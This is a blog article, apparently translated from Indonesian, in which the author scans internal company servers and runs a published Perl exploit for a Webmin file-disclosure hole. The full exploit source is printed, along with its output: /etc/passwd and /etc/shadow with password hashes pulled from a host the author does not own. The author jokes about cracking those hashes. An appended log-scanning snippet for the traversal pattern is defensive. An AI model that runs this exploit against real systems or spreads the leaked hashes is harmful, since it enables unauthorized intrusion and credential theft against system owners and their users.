Articles
By thesims
Published: January 13, 2008

Hmm, early in the morning as usual … off to the office by motorbike; this motorbike stands for 3 years of struggle until I could work at a company, even though I'm only an outsourced worker. That's my routine. Huh, I came in on a day off because I happened to have the morning shift … At the office I idly tinkered with my home-built server, which has turned out to be quite useful: from storing files, to remoting into the network, to MP3 streaming, huh, better than letting the server sit idle. I turned on my computer and tried to get online, ahhh, it turned out the gateway was down, annoying … just when I needed it for browsing, and on top of that all access was dropped … I idly ran a traceroute, and it turned out the problem was not at the gateway server hop but in the routing toward the outside, i.e. the public IP. I clearly remember this uses a Cisco router … ahh, I ignored this layer 3 problem for now and switched to layer 7 first…
Out of ideas, my head kept thinking and thinking, what is it, something seems odd, ohh yes!!! Like a neon light going on in my head: a friend once told me, "just use proxy.sibiru.co.id, Bal" ..
Hmm, just for fun I wanted to know where this proxy resolves to ….

Here's the result

[iqbal@boc ~]$ dig proxies.sibiru.co.id

; <<>> DiG 9.3.3rc2 <<>> proxies.sibiru.co.id
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6317
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 4, ADDITIONAL: 3

;; QUESTION SECTION:
;proxies.sibiru.co.id. IN A

;; ANSWER SECTION:
proxies.sibiru.co.id. 384 IN A 10.1.10.19
proxies.sibiru.co.id. 384 IN A 10.1.10.17
proxies.sibiru.co.id. 384 IN A 10.1.10.18

;; AUTHORITY SECTION:
sibiru.co.id. 384 IN NS ns.sibiru.co.id.
sibiru.co.id. 384 IN NS ns0.sibiru.co.id.
sibiru.co.id. 384 IN NS ldap.sibiru.co.id.
sibiru.co.id. 384 IN NS pusren01.risti.sibiru.co.id.

;; ADDITIONAL SECTION:
ns.sibiru.co.id. 384 IN A 10.2.1.5
ns0.sibiru.co.id. 384 IN A 10.2.12.12
ldap.sibiru.co.id. 384 IN A 10.1.2.38

;; Query time: 3 msec
;; SERVER: 10.11.15.220#53(10.11.15.220)
;; WHEN: Sun Jan 13 20:57:32 2008
;; MSG SIZE rcvd: 217


Now look at the ones printed in bold …. There are 3 servers here; I'll test with ping first to see which ones reply

[iqbal@boc ~]$ ping 10.1.10.19
PING 10.1.10.19 (10.1.10.19) 56(84) bytes of data.
64 bytes from 10.1.10.19: icmp_seq=1 ttl=60 time=26.1 ms
64 bytes from 10.1.10.19: icmp_seq=2 ttl=60 time=25.4 ms
64 bytes from 10.1.10.19: icmp_seq=3 ttl=60 time=25.9 ms
64 bytes from 10.1.10.19: icmp_seq=4 ttl=60 time=25.7 ms
64 bytes from 10.1.10.19: icmp_seq=5 ttl=60 time=25.3 ms
64 bytes from 10.1.10.19: icmp_seq=6 ttl=60 time=25.5 ms

--- 10.1.10.19 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 25.383/25.711/26.199/0.291 ms
[iqbal@boc ~]$ ping 10.1.10.17
PING 10.1.10.17 (10.1.10.17) 56(84) bytes of data.
64 bytes from 10.1.10.17: icmp_seq=1 ttl=60 time=25.4 ms
64 bytes from 10.1.10.17: icmp_seq=2 ttl=60 time=26.6 ms
64 bytes from 10.1.10.17: icmp_seq=3 ttl=60 time=25.4 ms
64 bytes from 10.1.10.17: icmp_seq=4 ttl=60 time=25.5 ms
64 bytes from 10.1.10.17: icmp_seq=5 ttl=60 time=25.1 ms

--- 10.1.10.17 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3998ms
rtt min/avg/max/mdev = 25.160/25.677/26.693/0.565 ms
[iqbal@boc ~]$ ping 10.1.10.18
PING 10.1.10.18 (10.1.10.18) 56(84) bytes of data.
64 bytes from 10.1.10.18: icmp_seq=1 ttl=60 time=25.6 ms
64 bytes from 10.1.10.18: icmp_seq=2 ttl=60 time=25.7 ms
64 bytes from 10.1.10.18: icmp_seq=3 ttl=60 time=25.2 ms
64 bytes from 10.1.10.18: icmp_seq=4 ttl=60 time=25.7 ms
64 bytes from 10.1.10.18: icmp_seq=5 ttl=60 time=25.4 ms
64 bytes from 10.1.10.18: icmp_seq=6 ttl=60 time=25.4 ms

--- 10.1.10.18 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 25.298/25.565/25.760/0.218 ms


Wow, cool … all of them reply, so for the proxy I just need to find the proxy port. Here is the result of the port scan I ran

[iqbal@boc ~]$ nmap 10.1.10.17-19

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-01-13 21:06 WIT
Interesting ports on 10.1.10.17:
Not shown: 1673 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
6000/tcp filtered X11
8080/tcp open http-proxy
8443/tcp open https-alt
10000/tcp open snet-sensor-mgmt

Interesting ports on 10.1.10.18:
Not shown: 1672 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
654/tcp open unknown
669/tcp open unknown
744/tcp open flexlm
6000/tcp open X11
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt

Interesting ports on 10.1.10.19:
Not shown: 1671 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
111/tcp open rpcbind
698/tcp open unknown
713/tcp open unknown
841/tcp open unknown
6000/tcp open X11
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt

Nmap finished: 3 IP addresses (3 hosts up) scanned in 29.547 seconds

Whoa, more question marks in my head: 10000 looks like it's for Webmin, right? And I was only looking for a proxy … what luck, while I'm at it I also want to know whether that server has a hole. After digging around I found it on the website http://www.milw0rm.com/exploits/2017, so I copy-pasted it into a file called webmin.pl. Here is the Webmin exploit


[iqbal@boc expl]$ cat webmin.pl
#!/usr/bin/perl
# Exploit for WEBMIN and USERMIN less than 1.29x
# ARBITARY REMOTE FILE DISCLOSURE
# WORKS FOR HTTP AND HTTPS (NOW)
# Thrusday 13th July 2006
# Vulnerability Disclosure at securitydot.net
# Coded by UmZ! umz32.dll@gmail.com
#
#
#
# Make sure you have LWP before using this exploit.
# USE IT AT YOUR OWN RISK
#
# GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
# for other.. like AHMED n FAIZ ... (GET A LIFE MAN).



# Revised on Friday 14th July 2006
use LWP::Simple;
use LWP::UserAgent;
my $userag = LWP::UserAgent->new;

if (@ARGV < 4) {
    # The argument names after "Usage:" were stripped on this page; the order is taken from @ARGV below.
    print("Usage: $0 \n");
    print("TARGETS are \n");
    print("0 - > HTTP \n");
    print(" 1 - > HTTPS \n");
    print("Define full path with file name \n");
    print("Example: ./webmin.pl blah.com 10000 /etc/passwd \n");
    exit(1);
}

($target, $port,$filename, $tar) = @ARGV;

print("WEBMIN EXPLOIT !!!!! coded by UmZ! \n");
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com \n");
print("Vulnerability disclose at securitydot.net \nI am just coding it in perl 'cuz I hate PHP! \n");
print("Attacking $target on port $port! \n");
print("FILENAME: $filename \n");


$temp="/..%01" x 40;

if ($tar == '0')
{
    my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
    $content=get $url;

    print(" FILE CONTENT STARTED\n");
    print(" ----------------------------------- \n");

    print("$content");
    print(" ------------------------------------- \n");
}


elsif ($tar == '1')
{
    my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
    my $req = HTTP::Request->new(GET => $url);
    my $res = $userag->request($req);
    if ($res->is_success) {
        print("FILE CONTENT STARTED \n");
        print("------------------------------------------- \n");
        print $res->as_string;
        print("------------------------------------------- \n");
    }
    else {
        print "Failed: ", $res->status_line, " \n";
    }
}

# milw0rm.com [2006-07-15]

[iqbal@boc expl]$ perl webmin.pl 10.1.10.18 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.18 on port 10000!
FILENAME: /etc/shadow
Failed: 404 File not found

This one failed

[iqbal@boc expl]$ perl webmin.pl 10.1.10.19 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.19 on port 10000!
FILENAME: /etc/shadow
Failed: 404 File not found

The result above also failed

[iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.17 on port 10000!
FILENAME: /etc/passwd
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Fri, 11 Jan 2008 06:42:31 GMT
Server: MiniServ/0.01
Content-Length: 1190
Content-Type: text/plain
Last-Modified: Tue, 20 Jun 2006 08:38:14 GMT
Client-Date: Fri, 11 Jan 2008 03:13:02 GMT
Client-Peer: 10.1.10.17:10000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified

root:0:0:root:/root:/bin/bash
bin:1:1:bin:/bin:/bin/sh
daemon:2:2:daemon:/sbin:/bin/sh
adm:3:4:adm:/var/adm:/bin/sh
lp:4:7:lp:/var/spool/lpd:/bin/sh
sync:5:0:sync:/sbin:/bin/sync
shutdown:6:0:shutdown:/sbin:/sbin/shutdown
halt:7:0:halt:/sbin:/sbin/halt
mail:8:12:mail:/var/spool/mail:/bin/sh
news:9:13:news:/var/spool/news:/bin/sh
uucp:10:14:uucp:/var/spool/uucp:/bin/sh
nobody:65534:65534:Nobody:/:/bin/sh
rpm:13:101:system user for rpm:/var/lib/rpm:/bin/false
vcsa:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:70:70:system user for portmap:/:/bin/false
xfs:71:71:system user for XFree86:/etc/X11/fs:/bin/false
postfix:72:72:system user for postfix:/var/spool/postfix:/bin/false
rpcuser:73:73:system user for nfs-utils:/var/lib/nfs:/bin/false
squid:74:74:system user for squid:/var/spool/squid:/bin/false
sshd:75:75:system user for openssh:/var/empty:/bin/true
admin:501:501:admin:/home/admin:/bin/bash
apache:76:76:system user for apache2:/var/www:/bin/sh
mysql:77:77:system user for MySQL:/var/lib/mysql:/bin/bash
iscan:503:503::/:/bin/false
bowo:505:505::/home/bowo:/bin/bash
bayu:506:506:Ariya Bayu:/home/bayu:/bin/bash

Whoa, I'm in ……… I got u …………..

[iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.17 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Fri, 11 Jan 2008 06:43:22 GMT
Server: MiniServ/0.01
Content-Length: 800
Content-Type: text/plain
Last-Modified: Sun, 25 Jun 2006 15:03:50 GMT
Client-Date: Fri, 11 Jan 2008 03:13:51 GMT
Client-Peer: 10.1.10.17:10000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified

root:$1$0R.FZtLM$WlBgN6.5NKBN7OafXgqNQ/:12887:0:99999:7:::
bin:*:12515:0:99999:7:::
daemon:*:12515:0:99999:7:::
adm:*:12515:0:99999:7:::
lp:*:12515:0:99999:7:::
sync:*:12515:0:99999:7:::
shutdown:*:12515:0:99999:7:::
halt:*:12515:0:99999:7:::
mail:*:12515:0:99999:7:::
news:*:12515:0:99999:7:::
uucp:*:12515:0:99999:7:::
nobody:*:12515:0:99999:7:::
rpm:!!:12515:0:99999:7:::
vcsa:!!:12515:0:99999:7:::
rpc:!!:12515:0:99999:7:::
xfs:!!:12515:0:99999:7:::
postfix:!!:12515:0:99999:7:::
rpcuser:!!:12515:0:99999:7:::
squid:!!:12515:0:99999:7:::
sshd:!!:12515:0:99999:7:::
admin:$1$lUbNGfKl$4/v4BWtT5bHGD.VDHa6cN/:12887:0:99999:7:::
apache:!!:12515:0:99999:7:::
mysql:!!:12515:0:99999:7:::
iscan:!!:12516:0:99999:7:::
bowo:$1$1I4B/3.T$tmnE.Za1kqrM5y8QGLYmS.:12550:0:99999:7:::
bayu:!!:12848:0:99999:7:::


It turns out 10.1.10.17 has a hole in Webmin … whoa, I can peek at /etc/passwd and /etc/shadow … hmm, I started out looking for a proxy and ended up finding this. Ahh, never mind, I just copy-pasted that /etc/passwd and /etc/shadow … maybe they'll be useful someday … and not bad, I got to peek … the next day I reported this problem to the owner, and it turned out I got a reply …. even though it could be worked on with John the Ripper or by looking for slocate.db (looking for plain-text passwords in *.conf) hihiihhi
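As an added example (not part of the original article and not the exploit author's code), here is a log check for the request shape used above: `/unauthenticated/` followed by repeated `/..%01`. It assumes Common Log Format-style access-log lines; the sample lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample lines; Common Log Format is an assumption about the
# Webmin access log, and 192.0.2.x are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jan/2008:21:10:02 +0700] "GET /unauthenticated/..%01/..%01/..%01/etc/passwd HTTP/1.0" 200 1190',
    '192.0.2.10 - - [13/Jan/2008:21:10:40 +0700] "GET /unauthenticated/..%01/..%01/..%01/etc/shadow HTTP/1.0" 404 0',
    '192.0.2.20 - - [13/Jan/2008:21:12:11 +0700] "GET /unauthenticated/images/logo.gif HTTP/1.0" 200 532',
]
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})\b')
CONTROL_BYTES = bytes(range(0x20)) + b"\x7f"

def decode_path(path, strip_controls):
    """Percent-decode the path; optionally drop control bytes such as %01."""
    raw = unquote_to_bytes(path.split("?", 1)[0])
    if strip_controls:
        raw = raw.translate(None, CONTROL_BYTES)
    return raw.decode("latin-1")

def resolve(path):
    """Collapse '.' and '..' segments the way a filesystem lookup would."""
    out = []
    for seg in path.split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)

def scan(lines):
    """Flag requests whose path has '..' once control bytes are removed.
    evades_dotdot_filter: a plain '..' check on the decoded path misses it."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, path, status = m.groups()
        cleaned = decode_path(path, strip_controls=True)
        if ".." not in cleaned.split("/"):
            continue
        findings.append({
            "client": client,
            "target": resolve(cleaned),
            "evades_dotdot_filter": ".." not in decode_path(path, False).split("/"),
            "served": status.startswith("2"),
        })
    return findings
```

A finding with `served` set to true means the file content went out, as with the 200 responses from 10.1.10.17 above; the 404 cases are still worth alerting on as probes.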

Thanks to: Allah SWT … , Cyberlog: sorry I could only send an article now, even if it's just this; I pray your wife stays in good health … , AdhietSlank: how's your girl, you're getting married, right, so hurry up and get married , k1nk0n9: still busy with the new job, eh, where's the treat … , Fl3xu5: still busy with college, eh … keep studying boss, don't lose heart , Sukam: where are you, man, when will we meet again … , Ariee & Rini: thanks for the support, may your child grow up to be a useful person, sorry I haven't had a chance to meet the little one, and Ariee, between the BTS and your body, your body is the heavier one heheheh … A-technique: sorry bro, I haven't had a chance to go to Depok again … let's just talk over YM hehehe , Jantap: hhehee, field manager: this guy knows a lot about BTS calculations, continued success … Letjen: law school but computers as a hobby, that fits, be my lawyer … for free, OK … success to all , ibnu: send me a pyramid, and a sphinx too, pleaaase …….. , z3r0byt3: how are you sir, still teaching in Bekasi? Sometime I want to come to your place to ask for enlightenment , friends at the BOC office: lets handling it okay , regards TheSimS aka Iqbal@sekuritionline.net


NB:

Apologies if any party has been harmed; the aim of this is learning, not exploiting a system weakness, and it is not meant to bring anyone down. And to the admin: be diligent about patching your system, that Webmin has a hole


